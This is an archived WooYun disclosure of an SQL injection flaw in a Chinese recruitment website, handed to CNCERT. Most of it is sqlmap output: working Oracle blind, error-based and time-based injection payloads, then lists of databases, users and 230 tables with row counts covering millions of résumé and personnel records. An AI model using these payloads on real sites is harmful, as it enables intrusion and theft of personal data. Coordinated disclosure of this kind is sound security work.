当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148996

漏洞标题:某人才网注入漏洞(导致上千万记录信息/60万用户信息/8万档案/户籍/人事信息等泄露)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-10-23 23:29

修复时间:2015-12-11 16:32

公开时间:2015-12-11 16:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:17

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-23: 细节已通知厂商并且等待厂商处理中
2015-10-27: 厂商已经确认,细节仅向厂商公开
2015-11-06: 细节向核心白帽子及相关领域专家公开
2015-11-16: 细节向普通白帽子公开
2015-11-26: 细节向实习白帽子公开
2015-12-11: 细节向公众公开

简要描述:

RT

详细说明:

某人才网注入漏洞(导致上千万记录信息/60万用户信息/8万档案/户籍/人事信息等泄露)....
上面还有大量的简历等各种招聘和简历 泄露。。。。。。
+-----------------------+
增量同步猎头简历
| 招聘会增量更新
| 猎头简历增量更新
| 简历增量更新
| 网络招聘增量更新
| 资讯信息增量更新
注入链接:http://**.**.**.**/schools/graduate_college.jsp?school_no=3641
一共3个站点,22数据库 ,230 张数据表。。。。。

sqlmap identified the following injection points with a total of 0 HTTP(s) 
reque
sts:
---
Place: GET
Parameter: school_no
    Type: boolean-based blind
    Title: Oracle boolean-based blind - Parameter replace (original value)
    Payload: school_no=(SELECT (CASE WHEN (1571=1571) THEN 3641 ELSE 1/
(SELECT 0
 FROM DUAL) END) FROM DUAL)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: school_no=3641 AND 8372=(SELECT UPPER(XMLType(CHR(60)||CHR
(58)||CHR
(111)||CHR(108)||CHR(104)||CHR(58)||(SELECT (CASE WHEN (8372=8372) THEN 1 
ELSE 0
 END) FROM DUAL)||CHR(58)||CHR(103)||CHR(117)||CHR(101)||CHR(58)||CHR
(62))) FROM
 DUAL)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: school_no=3641 AND 2595=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||
CHR(110
)||CHR(122)||CHR(118),5)
---
[20:27:48] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
available databases [22]:
[*] APEX_030200
[*] APPQOSSYS
[*] CDPX
[*] CORE
[*] CSRC
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] WMSYS
[*] XDB
database management system users [35]:
[*] ANONYMOUS
[*] APEX_030200
[*] APEX_PUBLIC_USER
[*] APPQOSSYS
[*] CDPX
[*] CORE
[*] CSRC
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDDATA
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] OWBSYS_AUDIT
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] WLS
[*] WMSYS
[*] XDB
[*] XS$NULL
current user:    'CSRC'
current schema (equivalent to database on Oracle):    'CSRC'
 the SQL query used returns 10450058 entries
Database: CSRC
[230 tables]
+-----------------------+
 增量同步猎头简历$_TEMP                |
| 招聘会增量更新$_TEMP                |
| 猎头简历增量更新$_TEMP                |
| 简历增量更新$_TEMP                |
| 网络招聘增量更新$_TEMP                |
| 资讯信息增量更新$_TEMP      |
| AB01                  |
| AC01                  |
| AD_AUTO               |
| AD_STAT               |
| AD_TRACER             |
| ALIPAY                |
| APPLYLOG              |
| APPLY_FUNC_TMP        |
| APPLY_FUNC_TMP_2      |
| BST_DEPARTMENT        |
| BST_DEP_REL           |
| CB01                  |
| CB15                  |
| CC01                  |
| CC02                  |
| CC05                  |
| CC09                  |
| CC10                  |
| CC21                  |
| COMPANY               |
| COMPANY_BACKUP        |
| C_AD                  |
| C_ASSIGN              |
| C_ATTACHMENT          |
| C_ATTACHMENT_HISTORY  |
| C_CONTACT             |
| C_CUSTOM              |
| C_ENGLISH             |
| C_FAVORITE            |
| C_FAVORITE_TYPE       |
| C_FEE_HISTORY         |
| C_INTEGRAL            |
| C_LOGON_LOG           |
| C_OPERATE_LOG         |
| C_OP_LOG              |
| C_PICTURE             |
| C_REPLY               |
| C_RESUME_LOG          |
| C_TRACER              |
| DEPARTMENT            |
| DIC_DEGREE            |
| DIC_EMPNUM            |
| DIC_FIELD             |
| DIC_FUNC              |
| DIC_FUNC_CATEGORY     |
| DIC_FUND              |
| DIC_H_CLIENT          |
| DIC_H_COOPERATE       |
| DIC_H_INDUSTRY        |
| DIC_H_PACT_TMPL       |
| DIC_H_PROPERTY        |
| DIC_H_REGION          |
| DIC_INDUSTRY          |
| DIC_LANGUAGE          |
| DIC_LEVEL             |
| DIC_LICENSE_TYPE      |
| DIC_LOC_CS            |
| DIC_MEMBER_TYPE       |
| DIC_PROPERTY          |
| DIC_REGION            |
| DIC_REGION_CS         |
| DIC_SALARY            |
| DIC_SCHOOL_KIND       |
| DIC_SCHOOL_PROPERTY   |
| DIC_TALENT_TYPE       |
| DIC_TITLE             |
| DS_TMP_WLS_USER       |
| DS_WZ_C_PICTURE       |
| D_AAC005              |
| D_AAC009              |
| D_AAC011              |
| D_ACA111              |
| D_DCC008              |
| ELE_PHOTO             |
| FAIR_APPLY_LOG        |
| FAIR_APPLY_STALL      |
| FAIR_FEEDBACK         |
| FAIR_LOC              |
| FAIR_RECRUIT          |
| FEEDBACK              |
| FEEDBACK2             |
| GLOBAL_USER           |
| H_APPLYLOG            |
| H_APPRAISE            |
| H_ATTACHMENT          |
| H_ATTACHMENT_P        |
| H_CANDIDATE           |
| H_CANDIDATE_BK        |
| H_CHANGE              |
| H_COMMEND             |
| H_COMPANY             |
| H_COMPANY_BK          |
| H_C_EDUC              |
| H_C_EDUC_BK           |
| H_C_EXP               |
| H_C_EXP_BK            |
| H_C_TAG               |
| H_DEL_LOG             |
| H_DESCRIPT            |
| H_EMAIL               |
| H_FEEDBACK            |
| H_FEEDBACK2           |
| H_FEEDBACK_OL         |
| H_INV                 |
| H_LOG                 |
| H_MESSAGE             |
| H_PACT2               |
| H_PAYLOG              |
| H_PHOTO               |
| H_RECOMMEND           |
| H_RECRUIT             |
| H_RECRUITLOG          |
| H_R_EDUC              |
| H_R_EXP               |
| H_SERVICE             |
| H_TEXT                |
| INFO                  |
| INFO_BK               |
| INFO_GROUP            |
| INFO_REPLY            |
| INFO_SEND             |
| INFO_SEND_LOG         |
| INVEST                |
| JA0A                  |
| JOB168E               |
| JOB168E_REPLY         |
| JOB168E_TMP           |
| JOB168E_TMP2          |
| JOB168E_TMP3          |
| JOB_FAIR              |
| MAP2011_FUNC          |
| MDAEMON               |
| MEMBERFEE             |
| MEMBERFEE_BK          |
| MEMBER_GROUP          |
| NEWSPAPER_BOARD       |
| NEWSPAPER_DETAIL      |
| PERSON                |
| PERSON_BACKUP         |
| PHOTO                 |
| P_CERT                |
| P_CUSTOM              |
| P_EDUC                |
| P_ELE                 |
| P_ENGLISH             |
| P_ETCSVC              |
| P_EXP                 |
| P_EXT_FEE             |
| P_FAVORITE            |
| P_FEE_HISTORY         |
| P_LOGON_LOG           |
| P_OPERATE_LOG         |
| P_OTHER               |
| P_PROJ                |
| P_RECOM               |
| P_RECRUIT_LOG         |
| P_SCHOOL              |
| P_TEXT                |
| P_TRACER              |
| P_VOL                 |
| QA                    |
| QXM_CONNECTS          |
| QXM_PROCESS           |
| RC_TMP                |
| REAL_DEGREE           |
| REAL_MOBILE           |
| REAL_NAME             |
| RECRUIT               |
| RECRUITLOG            |
| RECRUIT_APPLY_RELATED |
| RECRUIT_BK            |
| RECRUIT_CATALOG       |
| RECRUIT_RECYCLED      |
| REMIND_GROUP          |
| REMIND_SEND           |
| REMIND_SEND_LOG       |
| RESUMEOUT_LOG         |
| SCHOOL                |
| SCHOOL_FIELD          |
| SCHOOL_INFO           |
| SCHOOL_MEMBER_FEE     |
| SCHOOL_PAYMENTLOG     |
| SCHOOL_PERSON         |
| SCHOOL_PHOTO          |
| SCHOOL_RECRUITLOG     |
| SCHOOL_REQ            |
| SCHOOL_STUDINFO       |
| SMS_MO                |
| SMS_NUMBER            |
| SMS_REQUIREMENT       |
| SMS_TRACER            |
| SUB_COMPANY           |
| S_CUSTOM              |
| S_FAVORITE            |
| S_RECRUITMENT         |
| S_SIGNUP              |
| TENPAY                |
| TMP1_PERSON           |
| TMP_CC05              |
| TMP_DUL_NAME          |
| TMP_WLS_USER          |
| USER_GROUP            |
| VALID_HIRE            |
| VALID_JOBHUNT         |
| WLS_CONFIG            |
| WLS_DANGAN            |
| WLS_DIAOCHA           |
| WLS_DIAOCHA_STEP      |
| WLS_GRADUATEINFO      |
| WLS_HUJIGUANLI        |
| WLS_LAIFANTONGJI      |
| WLS_LOGSYS            |
| WLS_MESSAGE           |
| WLS_MESSAGE_RE        |
| WLS_NEWS              |
| WLS_NEWSTYPE          |
| WLS_NEWSTYPE_BAK      |
| WLS_NEWS_BAK          |
| WLS_PICTURE           |
| WLS_RENSHIYEWU        |
| WLS_ROLE              |
| WLS_USER              |
| WZ_AD_AUTO            |
| WZ_C_PICTURE          |
+-----------------------+
Database: CSRC
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| P_RECRUIT_LOG         | 10450058 |
| AD_TRACER             | 6523122 |
| C_RESUME_LOG          | 3882789 |
| CC01                  | 3531502 |
| CC05                  | 2827002 |
| P_OPERATE_LOG         | 2809807 |
| CC09                  | 2733742 |
| AC01                  | 2381245 |
| APPLYLOG              | 2022730 |
| P_LOGON_LOG           | 1849050 |
| CC10                  | 1727270 |
| CC02                  | 1554993 |
| QXM_CONNECTS          | 1528937 |
| CC21                  | 1484431 |
| CB01                  | 687316  |
| WLS_LAIFANTONGJI      | 564631  |
| C_LOGON_LOG           | 537863  |
| C_TRACER              | 353621  |
| P_EXP                 | 304025  |
| GLOBAL_USER           | 283218  |
| PERSON                | 273484  |
| P_TEXT                | 235395  |
| C_OPERATE_LOG         | 229954  |
| P_EDUC                | 216274  |
| RECRUIT_APPLY_RELATED | 98289   |
| WLS_DANGAN            | 87794   |
| QXM_PROCESS           | 78536   |
| APPLY_FUNC_TMP        | 73921   |
| RECRUIT_RECYCLED      | 55248   |
| P_FAVORITE            | 45990   |
| CB15                  | 45423   |
| C_OP_LOG              | 44400   |
| RECRUIT               | 42968   |
| AB01                  | 36923   |
| RECRUIT_BK            | 30524   |
| C_FAVORITE            | 22998   |
| FAIR_APPLY_LOG        | 21824   |
| FAIR_RECRUIT          | 21478   |
| FAIR_APPLY_STALL      | 19185   |
| PHOTO                 | 17961   |
| H_C_EXP               | 17239   |
| AD_STAT               | 16634   |
| VALID_JOBHUNT         | 15857   |
| RECRUITLOG            | 12159   |
| COMPANY               | 9126    |
| COMPANY_BACKUP        | 8177    |
| H_CANDIDATE           | 8156    |
| MEMBERFEE_BK          | 8026    |
| H_CHANGE              | 7450    |
87794 entries
Database: CSRC
Table: WLS_DANGAN
[21 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| BEIZHU          | VARCHAR2 |
| BIANHAO         | VARCHAR2 |
| CHUSHENGNIANYUE | VARCHAR2 |
| CREATETIME      | NUMBER   |
| DIANHUA         | VARCHAR2 |
| DIZHI           | VARCHAR2 |
| ID              | NUMBER   |
| JIEDANGREN      | VARCHAR2 |
| JIEDANGSHIJIAN  | VARCHAR2 |
| LAIDANDIANWEI   | VARCHAR2 |
| LAIDANSHIJIAN   | VARCHAR2 |
| MOD_USER_ID     | NUMBER   |
| MODTIME         | NUMBER   |
| QUXIANG         | VARCHAR2 |
| USER_ID         | NUMBER   |
| XINGBIE         | VARCHAR2 |
| XINGMING        | VARCHAR2 |
| XUELI           | VARCHAR2 |
| YUAN_ID         | NUMBER   |
| YUANKU          | VARCHAR2 |
| ZUZHIGUANXI     | VARCHAR2 |
+-----------------+----------+


2.png


3.png


4.png


5.png


漏洞证明:

数据太多了就不跑了

Database: CSRC
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| P_RECRUIT_LOG         | 10450058 |
| AD_TRACER             | 6523122 |
| C_RESUME_LOG          | 3882789 |
| CC01                  | 3531502 |
| CC05                  | 2827002 |
| P_OPERATE_LOG         | 2809807 |
| CC09                  | 2733742 |
| AC01                  | 2381245 |
| APPLYLOG              | 2022730 |
| P_LOGON_LOG           | 1849050 |
| CC10                  | 1727270 |
| CC02                  | 1554993 |
| QXM_CONNECTS          | 1528937 |
| CC21                  | 1484431 |
| CB01                  | 687316  |
| WLS_LAIFANTONGJI      | 564631  |
| C_LOGON_LOG           | 537863  |
| C_TRACER              | 353621  |
| P_EXP                 | 304025  |
| GLOBAL_USER           | 283218  |
| PERSON                | 273484  |
| P_TEXT                | 235395  |
| C_OPERATE_LOG         | 229954  |
| P_EDUC                | 216274  |
| RECRUIT_APPLY_RELATED | 98289   |
| WLS_DANGAN            | 87794   |
| QXM_PROCESS           | 78536   |
| APPLY_FUNC_TMP        | 73921   |
| RECRUIT_RECYCLED      | 55248   |
| P_FAVORITE            | 45990   |
| CB15                  | 45423   |
| C_OP_LOG              | 44400   |
| RECRUIT               | 42968   |
| AB01                  | 36923   |
| RECRUIT_BK            | 30524   |
| C_FAVORITE            | 22998   |
| FAIR_APPLY_LOG        | 21824   |
| FAIR_RECRUIT          | 21478   |
| FAIR_APPLY_STALL      | 19185   |
| PHOTO                 | 17961   |
| H_C_EXP               | 17239   |
| AD_STAT               | 16634   |
| VALID_JOBHUNT         | 15857   |
| RECRUITLOG            | 12159   |
| COMPANY               | 9126    |
| COMPANY_BACKUP        | 8177    |
| H_CANDIDATE           | 8156    |
| MEMBERFEE_BK          | 8026    |
| H_CHANGE              | 7450    |
| H_C_EDUC              | 7263    |
| SMS_TRACER            | 6116    |
| APPLY_FUNC_TMP_2      | 5142    |
| MEMBERFEE             | 4651    |
| WLS_HUJIGUANLI        | 3880    |
| INFO                  | 3842    |
| H_C_EXP_BK            | 3529    |
| C_INTEGRAL            | 3330    |
| H_CANDIDATE_BK        | 3125    |
| P_ENGLISH             | 2801    |
| P_CUSTOM              | 2780    |
| REAL_NAME             | 2652    |
| ELE_PHOTO             | 2395    |
| C_CUSTOM              | 2394    |
| WLS_NEWS              | 1976    |
| P_VOL                 | 1935    |
| WLS_LOGSYS            | 1876    |
| WLS_NEWS_BAK          | 1812    |
| H_APPLYLOG            | 1769    |
| H_LOG                 | 1681    |
| REMIND_SEND_LOG       | 1623    |
| INFO_SEND_LOG         | 1617    |
| NEWSPAPER_DETAIL      | 1455    |
| WLS_MESSAGE           | 1451    |
| H_C_EDUC_BK           | 1406    |
| BST_DEP_REL           | 968     |
| C_PICTURE             | 962     |
| BST_DEPARTMENT        | 943     |
| RESUMEOUT_LOG         | 939     |
| WZ_C_PICTURE          | 849     |
| WLS_RENSHIYEWU        | 830     |
| AD_AUTO               | 608     |
| DIC_FUNC              | 492     |
| P_SCHOOL              | 474     |
| H_TEXT                | 464     |
| DIC_REGION            | 455     |
| TMP_CC05              | 438     |
| SMS_MO                | 429     |
| SCHOOL_FIELD          | 422     |
| WZ_AD_AUTO            | 416     |
| WLS_PICTURE           | 408     |
| D_ACA111              | 348     |
| JOB_FAIR              | 330     |
| MAP2011_FUNC          | 277     |
| DIC_FIELD             | 274     |
| NEWSPAPER_BOARD       | 246     |
| RECRUIT_CATALOG       | 217     |
| WLS_NEWSTYPE_BAK      | 213     |
| WLS_NEWSTYPE          | 211     |
| C_FAVORITE_TYPE       | 210     |
| FAIR_FEEDBACK         | 159     |
| VALID_HIRE            | 138     |
| H_RECRUIT             | 116     |
| DEPARTMENT            | 94      |
| P_RECOM               | 91      |
| H_PHOTO               | 86      |
| SCHOOL_INFO           | 77      |
| FAIR_LOC              | 63      |
| SCHOOL                | 62      |
| D_AAC005              | 61      |
| C_REPLY               | 59      |
| C_AD                  | 58      |
| P_ELE                 | 54      |
| JOB168E_TMP           | 50      |
| JOB168E_TMP2          | 50      |
| JOB168E_TMP3          | 50      |
| SMS_NUMBER            | 41      |
| JA0A                  | 35      |
| DIC_INDUSTRY          | 31      |
| S_RECRUITMENT         | 30      |
| DIC_LOC_CS            | 27      |
| DIC_REGION_CS         | 27      |
| H_COMPANY_BK          | 27      |
| SMS_REQUIREMENT       | 27      |
| TMP_DUL_NAME          | 27      |
| DIC_PROPERTY          | 26      |
| H_SERVICE             | 20      |
| SCHOOL_PHOTO          | 20      |
| SCHOOL_PAYMENTLOG     | 15      |
| SCHOOL_MEMBER_FEE     | 14      |
| DIC_H_INDUSTRY        | 13      |
| D_AAC011              | 11      |
| DIC_FUNC_CATEGORY     | 11      |
| DIC_H_CLIENT          | 11      |
| H_DEL_LOG             | 11      |
| DIC_SALARY            | 10      |
| RC_TMP                | 9       |
| TMP1_PERSON           | 9       |
| D_AAC009              | 8       |
| DIC_LANGUAGE          | 8       |
| TMP_WLS_USER          | 8       |
| DIC_DEGREE            | 7       |
| DIC_LICENSE_TYPE      | 7       |
| DIC_EMPNUM            | 6       |
| DIC_H_PROPERTY        | 6       |
| DIC_TALENT_TYPE       | 6       |
| D_DCC008              | 5       |
| DIC_FUND              | 5       |
| DIC_LEVEL             | 5       |
| H_FEEDBACK_OL         | 5       |
| REMIND_SEND           | 5       |
| DIC_H_REGION          | 4       |
| DIC_SCHOOL_KIND       | 4       |
| DIC_TITLE             | 4       |
| DIC_H_COOPERATE       | 3       |
| H_DESCRIPT            | 3       |
| INFO_SEND             | 3       |
| REMIND_GROUP          | 3       |
| USER_GROUP            | 3       |
| DIC_SCHOOL_PROPERTY   | 2       |
| INFO_GROUP            | 2       |
| MDAEMON               | 2       |
| MEMBER_GROUP          | 2       |
| WLS_ROLE              | 2       |
| WLS_USER              | 2       |
| DIC_H_PACT_TMPL       | 1       |
| DIC_MEMBER_TYPE       | 1       |
| SUB_COMPANY           | 1       |
| WLS_MESSAGE_RE        | 1       |
+-----------------------+---------+


6.png


7.png


8.png


就这样吧。。。

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-27 16:30

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无